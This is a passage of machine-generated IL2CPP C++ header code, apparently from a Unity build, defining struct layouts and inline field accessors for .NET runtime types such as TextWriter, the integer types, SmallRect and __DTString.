TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 : public MarshalByRefObject_tC4577953D0A44D0AB8597CFA868E01C858B1C9AF { public: // System.Char[] System.IO.TextWriter::CoreNewLine CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___CoreNewLine_9; // System.IFormatProvider System.IO.TextWriter::InternalFormatProvider RuntimeObject* ___InternalFormatProvider_10; public: inline static int32_t get_offset_of_CoreNewLine_9() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0, ___CoreNewLine_9)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_CoreNewLine_9() const { return ___CoreNewLine_9; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_CoreNewLine_9() { return &___CoreNewLine_9; } inline void set_CoreNewLine_9(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___CoreNewLine_9 = value; Il2CppCodeGenWriteBarrier((&___CoreNewLine_9), value); } inline static int32_t get_offset_of_InternalFormatProvider_10() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0, ___InternalFormatProvider_10)); } inline RuntimeObject* get_InternalFormatProvider_10() const { return ___InternalFormatProvider_10; } inline RuntimeObject** get_address_of_InternalFormatProvider_10() { return &___InternalFormatProvider_10; } inline void set_InternalFormatProvider_10(RuntimeObject* value) { ___InternalFormatProvider_10 = value; Il2CppCodeGenWriteBarrier((&___InternalFormatProvider_10), value); } }; struct TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields { public: // System.IO.TextWriter System.IO.TextWriter::Null TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * ___Null_1; // System.Action`1<System.Object> System.IO.TextWriter::_WriteCharDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteCharDelegate_2; // System.Action`1<System.Object> System.IO.TextWriter::_WriteStringDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteStringDelegate_3; // System.Action`1<System.Object> System.IO.TextWriter::_WriteCharArrayRangeDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteCharArrayRangeDelegate_4; // System.Action`1<System.Object> System.IO.TextWriter::_WriteLineCharDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteLineCharDelegate_5; // System.Action`1<System.Object> System.IO.TextWriter::_WriteLineStringDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteLineStringDelegate_6; // System.Action`1<System.Object> System.IO.TextWriter::_WriteLineCharArrayRangeDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____WriteLineCharArrayRangeDelegate_7; // System.Action`1<System.Object> System.IO.TextWriter::_FlushDelegate Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * ____FlushDelegate_8; public: inline static int32_t get_offset_of_Null_1() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ___Null_1)); } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * get_Null_1() const { return ___Null_1; } inline TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 ** get_address_of_Null_1() { return &___Null_1; } inline void set_Null_1(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0 * value) { ___Null_1 = value; Il2CppCodeGenWriteBarrier((&___Null_1), value); } inline static int32_t get_offset_of__WriteCharDelegate_2() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteCharDelegate_2)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteCharDelegate_2() const { return ____WriteCharDelegate_2; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteCharDelegate_2() { return &____WriteCharDelegate_2; } inline void set__WriteCharDelegate_2(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteCharDelegate_2 = value; Il2CppCodeGenWriteBarrier((&____WriteCharDelegate_2), value); } inline static int32_t get_offset_of__WriteStringDelegate_3() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteStringDelegate_3)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteStringDelegate_3() const { return ____WriteStringDelegate_3; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteStringDelegate_3() { return &____WriteStringDelegate_3; } inline void set__WriteStringDelegate_3(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteStringDelegate_3 = value; Il2CppCodeGenWriteBarrier((&____WriteStringDelegate_3), value); } inline static int32_t get_offset_of__WriteCharArrayRangeDelegate_4() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteCharArrayRangeDelegate_4)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteCharArrayRangeDelegate_4() const { return ____WriteCharArrayRangeDelegate_4; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteCharArrayRangeDelegate_4() { return &____WriteCharArrayRangeDelegate_4; } inline void set__WriteCharArrayRangeDelegate_4(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteCharArrayRangeDelegate_4 = value; Il2CppCodeGenWriteBarrier((&____WriteCharArrayRangeDelegate_4), value); } inline static int32_t get_offset_of__WriteLineCharDelegate_5() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteLineCharDelegate_5)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteLineCharDelegate_5() const { return ____WriteLineCharDelegate_5; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteLineCharDelegate_5() { return &____WriteLineCharDelegate_5; } inline void set__WriteLineCharDelegate_5(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteLineCharDelegate_5 = value; Il2CppCodeGenWriteBarrier((&____WriteLineCharDelegate_5), value); } inline static int32_t get_offset_of__WriteLineStringDelegate_6() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteLineStringDelegate_6)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteLineStringDelegate_6() const { return ____WriteLineStringDelegate_6; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteLineStringDelegate_6() { return &____WriteLineStringDelegate_6; } inline void set__WriteLineStringDelegate_6(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteLineStringDelegate_6 = value; Il2CppCodeGenWriteBarrier((&____WriteLineStringDelegate_6), value); } inline static int32_t get_offset_of__WriteLineCharArrayRangeDelegate_7() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____WriteLineCharArrayRangeDelegate_7)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__WriteLineCharArrayRangeDelegate_7() const { return ____WriteLineCharArrayRangeDelegate_7; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__WriteLineCharArrayRangeDelegate_7() { return &____WriteLineCharArrayRangeDelegate_7; } inline void set__WriteLineCharArrayRangeDelegate_7(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____WriteLineCharArrayRangeDelegate_7 = value; Il2CppCodeGenWriteBarrier((&____WriteLineCharArrayRangeDelegate_7), value); } inline static int32_t get_offset_of__FlushDelegate_8() { return static_cast<int32_t>(offsetof(TextWriter_t92451D929322093838C41489883D5B2D7ABAF3F0_StaticFields, ____FlushDelegate_8)); } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * get__FlushDelegate_8() const { return ____FlushDelegate_8; } inline Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 ** get_address_of__FlushDelegate_8() { return &____FlushDelegate_8; } inline void set__FlushDelegate_8(Action_1_t551A279CEADCF6EEAE8FA2B1E1E757D0D15290D0 * value) { ____FlushDelegate_8 = value; Il2CppCodeGenWriteBarrier((&____FlushDelegate_8), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TEXTWRITER_T92451D929322093838C41489883D5B2D7ABAF3F0_H #ifndef INT16_T823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_H #define INT16_T823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Int16 struct Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D { public: // System.Int16 System.Int16::m_value int16_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Int16_t823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D, ___m_value_0)); } inline int16_t get_m_value_0() const { return ___m_value_0; } inline int16_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(int16_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INT16_T823A20635DAF5A3D93A1E01CFBF3CBA27CF00B4D_H #ifndef INT32_T585191389E07734F19F3156FF88FB3EF4800D102_H #define INT32_T585191389E07734F19F3156FF88FB3EF4800D102_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Int32 struct Int32_t585191389E07734F19F3156FF88FB3EF4800D102 { public: // System.Int32 System.Int32::m_value int32_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Int32_t585191389E07734F19F3156FF88FB3EF4800D102, ___m_value_0)); } inline int32_t get_m_value_0() const { return ___m_value_0; } inline int32_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(int32_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INT32_T585191389E07734F19F3156FF88FB3EF4800D102_H #ifndef INT64_T7A386C2FF7B0280A0F516992401DDFCF0FF7B436_H #define INT64_T7A386C2FF7B0280A0F516992401DDFCF0FF7B436_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Int64 struct Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436 { public: // System.Int64 System.Int64::m_value int64_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Int64_t7A386C2FF7B0280A0F516992401DDFCF0FF7B436, ___m_value_0)); } inline int64_t get_m_value_0() const { return ___m_value_0; } inline int64_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(int64_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INT64_T7A386C2FF7B0280A0F516992401DDFCF0FF7B436_H #ifndef INTPTR_T_H #define INTPTR_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.IntPtr struct IntPtr_t { public: // System.Void* System.IntPtr::m_value void* ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(IntPtr_t, ___m_value_0)); } inline void* get_m_value_0() const { return ___m_value_0; } inline void** get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(void* value) { ___m_value_0 = value; } }; struct IntPtr_t_StaticFields { public: // System.IntPtr System.IntPtr::Zero intptr_t ___Zero_1; public: inline static int32_t get_offset_of_Zero_1() { return static_cast<int32_t>(offsetof(IntPtr_t_StaticFields, ___Zero_1)); } inline intptr_t get_Zero_1() const { return ___Zero_1; } inline intptr_t* get_address_of_Zero_1() { return &___Zero_1; } inline void set_Zero_1(intptr_t value) { ___Zero_1 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INTPTR_T_H #ifndef SBYTE_T9070AEA2966184235653CB9B4D33B149CDA831DF_H #define SBYTE_T9070AEA2966184235653CB9B4D33B149CDA831DF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.SByte struct SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF { public: // System.SByte System.SByte::m_value int8_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(SByte_t9070AEA2966184235653CB9B4D33B149CDA831DF, ___m_value_0)); } inline int8_t get_m_value_0() const { return ___m_value_0; } inline int8_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(int8_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SBYTE_T9070AEA2966184235653CB9B4D33B149CDA831DF_H #ifndef SINGLE_TDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_H #define SINGLE_TDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Single struct Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1 { public: // System.Single System.Single::m_value float ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Single_tDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1, ___m_value_0)); } inline float get_m_value_0() const { return ___m_value_0; } inline float* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(float value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SINGLE_TDDDA9169C4E4E308AC6D7A824F9B28DC82204AE1_H #ifndef SMALLRECT_T18C271B0FF660F6ED4EC6D99B26C4D35F51CA532_H #define SMALLRECT_T18C271B0FF660F6ED4EC6D99B26C4D35F51CA532_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.SmallRect struct SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532 { public: // System.Int16 System.SmallRect::Left int16_t ___Left_0; // System.Int16 System.SmallRect::Top int16_t ___Top_1; // System.Int16 System.SmallRect::Right int16_t ___Right_2; // System.Int16 System.SmallRect::Bottom int16_t ___Bottom_3; public: inline static int32_t get_offset_of_Left_0() { return static_cast<int32_t>(offsetof(SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532, ___Left_0)); } inline int16_t get_Left_0() const { return ___Left_0; } inline int16_t* get_address_of_Left_0() { return &___Left_0; } inline void set_Left_0(int16_t value) { ___Left_0 = value; } inline static int32_t get_offset_of_Top_1() { return static_cast<int32_t>(offsetof(SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532, ___Top_1)); } inline int16_t get_Top_1() const { return ___Top_1; } inline int16_t* get_address_of_Top_1() { return &___Top_1; } inline void set_Top_1(int16_t value) { ___Top_1 = value; } inline static int32_t get_offset_of_Right_2() { return static_cast<int32_t>(offsetof(SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532, ___Right_2)); } inline int16_t get_Right_2() const { return ___Right_2; } inline int16_t* get_address_of_Right_2() { return &___Right_2; } inline void set_Right_2(int16_t value) { ___Right_2 = value; } inline static int32_t get_offset_of_Bottom_3() { return static_cast<int32_t>(offsetof(SmallRect_t18C271B0FF660F6ED4EC6D99B26C4D35F51CA532, ___Bottom_3)); } inline int16_t get_Bottom_3() const { return ___Bottom_3; } inline int16_t* get_address_of_Bottom_3() { return &___Bottom_3; } inline void set_Bottom_3(int16_t value) { ___Bottom_3 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SMALLRECT_T18C271B0FF660F6ED4EC6D99B26C4D35F51CA532_H #ifndef SYSTEMEXCEPTION_T5380468142AA850BE4A341D7AF3EAB9C78746782_H #define SYSTEMEXCEPTION_T5380468142AA850BE4A341D7AF3EAB9C78746782_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.SystemException struct SystemException_t5380468142AA850BE4A341D7AF3EAB9C78746782 : public Exception_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SYSTEMEXCEPTION_T5380468142AA850BE4A341D7AF3EAB9C78746782_H #ifndef UINT16_TAE45CEF73BF720100519F6867F32145D075F928E_H #define UINT16_TAE45CEF73BF720100519F6867F32145D075F928E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.UInt16 struct UInt16_tAE45CEF73BF720100519F6867F32145D075F928E { public: // System.UInt16 System.UInt16::m_value uint16_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(UInt16_tAE45CEF73BF720100519F6867F32145D075F928E, ___m_value_0)); } inline uint16_t get_m_value_0() const { return ___m_value_0; } inline uint16_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(uint16_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // UINT16_TAE45CEF73BF720100519F6867F32145D075F928E_H #ifndef UINT32_T4980FA09003AFAAB5A6E361BA2748EA9A005709B_H #define UINT32_T4980FA09003AFAAB5A6E361BA2748EA9A005709B_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.UInt32 struct UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B { public: // System.UInt32 System.UInt32::m_value uint32_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(UInt32_t4980FA09003AFAAB5A6E361BA2748EA9A005709B, ___m_value_0)); } inline uint32_t get_m_value_0() const { return ___m_value_0; } inline uint32_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(uint32_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // UINT32_T4980FA09003AFAAB5A6E361BA2748EA9A005709B_H #ifndef UINT64_TA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_H #define UINT64_TA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.UInt64 struct UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E { public: // System.UInt64 System.UInt64::m_value uint64_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(UInt64_tA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E, ___m_value_0)); } inline uint64_t get_m_value_0() const { return ___m_value_0; } inline uint64_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(uint64_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // UINT64_TA02DF3B59C8FC4A849BD207DA11038CC64E4CB4E_H #ifndef VOID_T22962CB4C05B1D89B55A6E1139F0E87A90987017_H #define VOID_T22962CB4C05B1D89B55A6E1139F0E87A90987017_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void struct Void_t22962CB4C05B1D89B55A6E1139F0E87A90987017 { public: union { struct { }; uint8_t Void_t22962CB4C05B1D89B55A6E1139F0E87A90987017__padding[1]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // VOID_T22962CB4C05B1D89B55A6E1139F0E87A90987017_H #ifndef __DTSTRING_T6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_H #define __DTSTRING_T6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.__DTString struct __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 { public: // System.String System.__DTString::Value String_t* ___Value_0; // System.Int32 System.__DTString::Index int32_t ___Index_1; // System.Int32 System.__DTString::len int32_t ___len_2; // System.Char System.__DTString::m_current Il2CppChar ___m_current_3; // System.Globalization.CompareInfo System.__DTString::m_info CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___m_info_4; // System.Boolean System.__DTString::m_checkDigitToken bool ___m_checkDigitToken_5; public: inline static int32_t get_offset_of_Value_0() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___Value_0)); } inline String_t* get_Value_0() const { return ___Value_0; } inline String_t** get_address_of_Value_0() { return &___Value_0; } inline void set_Value_0(String_t* value) { ___Value_0 = value; Il2CppCodeGenWriteBarrier((&___Value_0), value); } inline static int32_t get_offset_of_Index_1() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___Index_1)); } inline int32_t get_Index_1() const { return ___Index_1; } inline int32_t* get_address_of_Index_1() { return &___Index_1; } inline void set_Index_1(int32_t value) { ___Index_1 = value; } inline static int32_t get_offset_of_len_2() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___len_2)); } inline int32_t get_len_2() const { return ___len_2; } inline int32_t* get_address_of_len_2() { return &___len_2; } inline void set_len_2(int32_t value) { ___len_2 = value; } inline static int32_t get_offset_of_m_current_3() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___m_current_3)); } inline Il2CppChar get_m_current_3() const { return ___m_current_3; } inline Il2CppChar* get_address_of_m_current_3() { return &___m_current_3; } inline void set_m_current_3(Il2CppChar value) { ___m_current_3 = value; } inline static int32_t get_offset_of_m_info_4() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___m_info_4)); } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * get_m_info_4() const { return ___m_info_4; } inline CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 ** get_address_of_m_info_4() { return &___m_info_4; } inline void set_m_info_4(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * value) { ___m_info_4 = value; Il2CppCodeGenWriteBarrier((&___m_info_4), value); } inline static int32_t get_offset_of_m_checkDigitToken_5() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9, ___m_checkDigitToken_5)); } inline bool get_m_checkDigitToken_5() const { return ___m_checkDigitToken_5; } inline bool* get_address_of_m_checkDigitToken_5() { return &___m_checkDigitToken_5; } inline void set_m_checkDigitToken_5(bool value) { ___m_checkDigitToken_5 = value; } }; struct __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_StaticFields { public: // System.Char[] System.__DTString::WhiteSpaceChecks CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___WhiteSpaceChecks_6; public: inline static int32_t get_offset_of_WhiteSpaceChecks_6() { return static_cast<int32_t>(offsetof(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_StaticFields, ___WhiteSpaceChecks_6)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_WhiteSpaceChecks_6() const { return ___WhiteSpaceChecks_6; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_WhiteSpaceChecks_6() { return &___WhiteSpaceChecks_6; } inline void set_WhiteSpaceChecks_6(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___WhiteSpaceChecks_6 = value; Il2CppCodeGenWriteBarrier((&___WhiteSpaceChecks_6), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.__DTString struct __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_marshaled_pinvoke { char* ___Value_0; int32_t ___Index_1; int32_t ___len_2; uint8_t ___m_current_3; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___m_info_4; int32_t ___m_checkDigitToken_5; }; // Native definition for COM marshalling of System.__DTString struct __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_marshaled_com { Il2CppChar* ___Value_0; int32_t ___Index_1; int32_t ___len_2; uint8_t ___m_current_3; CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___m_info_4; int32_t ___m_checkDigitToken_5; }; #endif // __DTSTRING_T6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9_H #ifndef U3CPRIVATEIMPLEMENTATIONDETAILSU3E_T5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_H #define U3CPRIVATEIMPLEMENTATIONDETAILSU3E_T5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails> struct U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A : public RuntimeObject { public: public: }; struct U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields { public: // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=256 <PrivateImplementationDetails>::0392525BCB01691D1F319D89F2C12BF93A478467 __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F ___0392525BCB01691D1F319D89F2C12BF93A478467_0; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=72 <PrivateImplementationDetails>::0588059ACBD52F7EA2835882F977A9CF72EB9775 __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 ___0588059ACBD52F7EA2835882F977A9CF72EB9775_1; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=84 <PrivateImplementationDetails>::0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C __StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A ___0A1ADB22C1D3E1F4B2448EE3F27DF9DE63329C4C_2; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=240 <PrivateImplementationDetails>::121EC59E23F7559B28D338D562528F6299C2DE22 __StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8 ___121EC59E23F7559B28D338D562528F6299C2DE22_3; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3 <PrivateImplementationDetails>::12D04472A8285260EA12FD3813CDFA9F2D2B548C __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E ___12D04472A8285260EA12FD3813CDFA9F2D2B548C_4; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3 <PrivateImplementationDetails>::13A35EF1A549297C70E2AD46045BBD2ECA17852D __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E ___13A35EF1A549297C70E2AD46045BBD2ECA17852D_5; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=24 <PrivateImplementationDetails>::1730F09044E91DB8371B849EFF5E6D17BDE4AED0 __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 ___1730F09044E91DB8371B849EFF5E6D17BDE4AED0_6; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3 <PrivateImplementationDetails>::1A84029C80CB5518379F199F53FF08A7B764F8FD __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E ___1A84029C80CB5518379F199F53FF08A7B764F8FD_7; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2048 <PrivateImplementationDetails>::1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5 __StaticArrayInitTypeSizeU3D2048_t95CEED630052F2BBE3122C058EEAD48DB4C2AD02 ___1E41C4CD0767AEA21C00DEABA2EA9407F1E6CEA5_8; // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=16 <PrivateImplementationDetails>::1FE6CE411858B3D864679DE2139FB081F08BFACD __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 ___1FE6CE411858B3D864679DE2139FB081F08BFACD_9; // 